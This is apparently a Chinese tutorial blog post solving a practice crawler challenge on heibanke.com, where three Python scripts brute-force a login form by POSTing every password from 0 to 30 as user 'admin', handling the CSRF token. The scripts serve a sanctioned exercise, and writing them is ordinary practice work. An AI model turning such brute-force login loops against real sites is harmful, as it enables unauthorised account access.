来到第二题,此题是输入昵称和密码,进行登陆。昵称随便,密码是30以内的数字。此题如图
我们需要用Python爬虫方面的知识,这里有两种方法来实现
一、用requests库和re正则表达式来完成
1、requests库进行得到网页
2、re 正则表达式来匹配内容
3、此题的思路是用requests.post()请求和 for循环来实现从0到30的输入。
随即输入昵称和密码后,在F12控制台找到post请求,如下图
此题的Form Data里的csrmiddlewaretoken的值是固定是 nUoIzgSBUlbZmCZW8QjtyrLnd7RjFM0F。
不随着你输入的username 和password而改变。所以可以用下边的代码1。
如果Form Data里的csrmiddlewaretoken的值是变化的,可以写个函数从Cookie里的得到,代码如代码2
具体代码如下
代码1、Form Data里的csrmiddlewaretoken的值是固定的
import requests
import re
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/68.0.3440.106 Safari/537.36"}
def attack(password):
url = "http://www.heibanke.com/lesson/crawler_ex01/"
data = {
"csrfmiddlewaretoken": "nUoIzgSBUlbZmCZW8QjtyrLnd7RjFM0F",
"username": "admin",
"password": password,
}
# nUoIzgSBUlbZmCZW8QjtyrLnd7RjFM0F
response = requests.post(url, headers=headers, data=data)
html = re.findall(r'<h3>(.*?)</h3>', response.text)
print(html[0])
def main():
for password in range(31):
print(password)
attack(password)
main()
代码2、Form Data里的csrmiddlewaretoken的值是不固定的(固定也能用此代码)
import requests
import re
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0",
}
def get_csrf():
url = 'http://www.heibanke.com/lesson/crawler_ex01/'
response = requests.get(url, headers=headers)
response = str(response.headers)
csrf = re.findall('csrftoken=(.*?);', response)
return csrf[0]
def attack(csrf, password):
data = {
"csrfmiddlewaretoken": csrf,
"username": "admin",
"password": password,
}
url = 'http://www.heibanke.com/lesson/crawler_ex01/'
response = requests.post(url, headers=headers, data=data).text
info = re.findall('<h3>(.*?)</h3>', response)
print(info[0])
def main():
csrf = get_csrf()
for password in range(31):
print(password)
attack(csrf, password)
main()
运行结果如下,可以得到密码
二、用urllib.request、http.cookiejar、bs4库来实现
代码如下
import bs4
from bs4 import BeautifulSoup
import urllib.request
import http.cookiejar
url = "http://www.heibanke.com/lesson/crawler_ex01/"
cj = http.cookiejar.LWPCookieJar()
cookie_support = urllib.request.HTTPCookieProcessor(cj)
opener = urllib.request.build_opener(cookie_support, urllib.request.HTTPHandler)
urllib.request.install_opener(opener)
data = urllib.request.urlopen(url).read()
data = data.decode('utf-8')
# headers和postData分析自抓包
headers = {
'Accept': 'text/html, application/xhtml+xml, image/jxr',
'Referer': 'http://www.heibanke.com/lesson/crawler_ex01/',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586'
}
password = 0
while True:
postData = {
'csrfmiddlewaretoken' : 'sczCT2OaFZ5BAxTXR0rBNSFuqummuY2y',
'username' : 'admin',
'password' : password
}
postData = urllib.parse.urlencode(postData)
postData = postData.encode('utf-8')
# 进行编码,否则会报POST data should be bytes or an iterable of bytes. It cannot be str.错误.
req = urllib.request.Request(url, postData, headers)
print(req)
response = urllib.request.urlopen(req)
text = response.read().decode('utf-8')
#print(text)
soup = BeautifulSoup(text, "lxml")
msg = soup.body.h3.string
if msg == "您输入的密码错误, 请重新输入":
password += 1
continue
else:
print(msg)
print("password is : " + str(password))
break
#print(data)
运行结果如下
点击链接 https://blog.csdn.net/Ljt101222/article/details/82428351 进入 Python黑板客爬虫闯关三